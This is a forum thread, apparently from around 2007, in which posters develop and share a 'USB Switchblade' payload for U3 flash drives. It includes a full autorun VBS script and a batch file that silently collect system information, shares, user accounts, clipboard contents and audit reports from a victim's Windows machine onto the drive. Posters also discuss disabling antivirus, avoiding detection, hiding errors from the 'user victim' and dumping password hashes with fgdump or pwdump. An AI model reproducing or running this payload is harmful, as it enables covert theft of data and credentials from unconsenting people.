[~Gozor~ Finished Payload]

I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.

@HarshReality

The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure

Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.

The 2 ways I know to keep from scanning yourself:

1. checks for presence of file "X"

2. checks computername/user against list stored in file on U3

Personally I would go with 1, less of paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.

[USB Switchblade Development]

So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files

This is so that I can output the data into HTML format (very similar to WinAudit html)

Now here comes one question/decision. Since vbs is more powerful then a simple batch file I can either

A. wshell.exec ("net user") which will be very fast and give me a list of users

B. Use WMI or another technique and get vastly more data

AccountType Caption Description Disabled Domain FullName LocalAccount Lockout
Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status

After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds.

Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.

[~Gozor~ Finished Payload]

Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

[~Gozor~ Finished Payload]

Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.

[~Gozor~ Finished Payload]

I'd like to see that HTML output. I'm working on that now myself.

[~Gozor~ Finished Payload]

http://www.frontiernet.net/~wardriver/U3CUSTOM.zip

That's got just the scripts and .dat files needed

Items in the FD folder need to go on the flash partition sans the FD folder

[~Gozor~ Finished Payload]

I made some updates to your scripts, nice job btw.

go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better then crashing and posting a dialog to the user victim.

I've included only what's different otherwise I'm over the max characters for message:

Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next


strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

For Each objDrive in colDrives
    'ignore floppy drives - reserved by BIOS if they don't exist
    If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
        If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then
            strfd = objDrive.Driveletter & ":"
        End If
        If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then
            strU3 = objDrive.Driveletter & ":"
        End If
    End if
Next




If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then
   objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3  & "," & strDate & "," & strTime, 0, False

End If

If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then
   objShell.Run ".LaunchU3.exe -a"
   
End If

go.bat

I've added nircmd to grab the clipboard contents and winaudit (google it)

:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off



If %computername%.==. SET computername=computer
If %username%.==. SET username=None

SET fd=%1System
SET U3=%2SystemSRC

CD %U3% >NUL

:: SET LOG PATHS
    IF NOT EXIST %fd%Logs%computername% (
        MD %fd%Logs%computername%
        )

    SET logdir=%fd%Logs%computername%
    SET log="%fd%Logs%computername%%computername%-[%3-%4].log"
    SET tmplog="%fd%Logs%computername%%computername%_TEMP.log"
    SET include="%fd%SRCInclude
    SET /p eipurl=<"%1SystemSRCIncludeEIP.dat"
    SET /p winaud=<"%1SystemSRCIncludewinaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%0.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +          [System info]           + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
        IPCONFIG /all >> %log% 2>&1

    Echo +-----------------------------------+  >> %log% 2>&1
    Echo +              Shares               +  >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1 
          net share >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1
    Echo +              Users                +  >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1 
          net user >> %log% 2>&1
    )
    

    
IF EXIST %include%19.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1
    Echo +            Clipboard              +  >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1
          .nircmd.exe clipboard addfile %log%
    )

IF EXIST %include%20.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1
    Echo +            Win Audit              +  >> %log% 2>&1
    Echo +-----------------------------------+  >> %log% 2>&1
              ECHO WinAudit saved to %logdir% >> %log% 2>&1
            .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt  >> %log% 2>&1
              ECHO. >> %log% 2>&1     
    )
    
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
    EXIT

winaud.dat rtfm for winaudit to see what the switches do

/r=oxutn /o=PDF /m=CA Security Scan

Also for the EIP I use

http://checkip.dyndns.org/

You could use regular expressions to remove the extra HTML

<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>

but it gets the job done and uses a public server

Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)

[~Gozor~ Finished Payload]

Found the following issues

| was being used as a piped command where I think your intention was for it to be a pipe character.

If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail

Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get

computername - [volume in drive d is removable].log

I'm investigating root cause.

[~Gozor~ Finished Payload]

In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

SET include="G:SRCInclude

IF EXIST %include%0.dat"

When the second line is expanded it will look like this

"G:SRCInclude0.dat"

Note the " on either end, If I were to enclose each in " like so

SET include="G:SRCInclude"

IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail

""G:SRCInclude"0.dat"

To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.

I'm doing some tweaks to it now and compiling the batch files to executables, etc.

Id love to take a look at the tweaks you've made, as well as the executable. What language?

It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some case 3 " which what I expected to see in your code. But that tends to  muck things up so instead I'll use chr(34) or equivalent and concatenation.

I guess the batch file environment is more forgiving being an interpretated language but it makes the syntax highlighting in ExeScript goofing.

That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with a exe wrapper. Not a real executable, yet.

One thing I've done is changed the layout for the log file:

ECHO +-----------------------------------+ >> %log% 2>&1
ECHO |          [System info]            | >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1

I find the above easier on the eyes then the old ***** method

I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when its done.

The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather then flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.

[~Gozor~ Finished Payload]

Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc.  But one thing struck me as odd and most likely it's my relatively vacant use of batch files.  You seem to use the " mark singularly.

such as:

SET U3="%%i:SRC 

or

IF EXIST %include%1. dat" (

What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning. 

Just curious.